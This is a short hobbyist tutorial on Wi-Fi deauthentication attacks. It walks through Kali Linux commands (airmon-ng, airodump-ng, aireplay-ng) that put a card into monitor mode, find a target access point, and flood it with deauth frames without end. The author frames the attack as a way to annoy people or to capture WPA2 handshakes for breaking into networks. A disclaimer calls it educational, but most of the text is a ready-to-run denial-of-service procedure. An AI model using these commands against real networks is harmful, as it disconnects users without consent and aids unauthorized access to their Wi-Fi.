DeauthAttacks
Deauth hacks are one of the most useful and common hacks that is used to kick people of the wifi. This can be used to annoy people, though normally it is used to capture the WPA2 4-way wifi handshake. This is used for forcing access into a wifi network.
Disclaimer
I DO NOT CONDONE ANY DESTRUCTION CAUSED BY ANY OF THESE HACKS. THESE ARE MERELY USED FOR EDUCATION.
Prerequisets
Inorder to exceute the hack we need to install some packages. I will be using KALI LINUX when doing this hack. Pacakges you will need is airmon-ng, aircrack-ng and airodump-ng.
How to do the attack
Open a command line and type.
sudo -i
Enter your password then press enter. Then Type
iwconfig
You should see wlan0 or wlan1. If this is the case type
airmon-ng start wlan0
Accept all of the prompts. Now type:
airodump-ng wlan0mon
This will show an interface that looks something like this.
As you can see I have a WPA2 router still visible. This is a router that I have setup and configured and is currently being hosted on an ESP32. We are now going to kick this off of the wifi using the deauth attack. First open up a second tab. We need to note down some information. First Note down the labeled parts below
Note down all of the listed data that is needed. In you first root shell type.
airodump-ng -c {your_channel} --bssid {your_bssid} wlan0mon
then type in another window
aireplay-ng --deauth 0 -a {your_bssid} wlan0mon
And there you have it. You have just kicked everything off that wifi network. You may have to do all access points individually. Thanks For Reading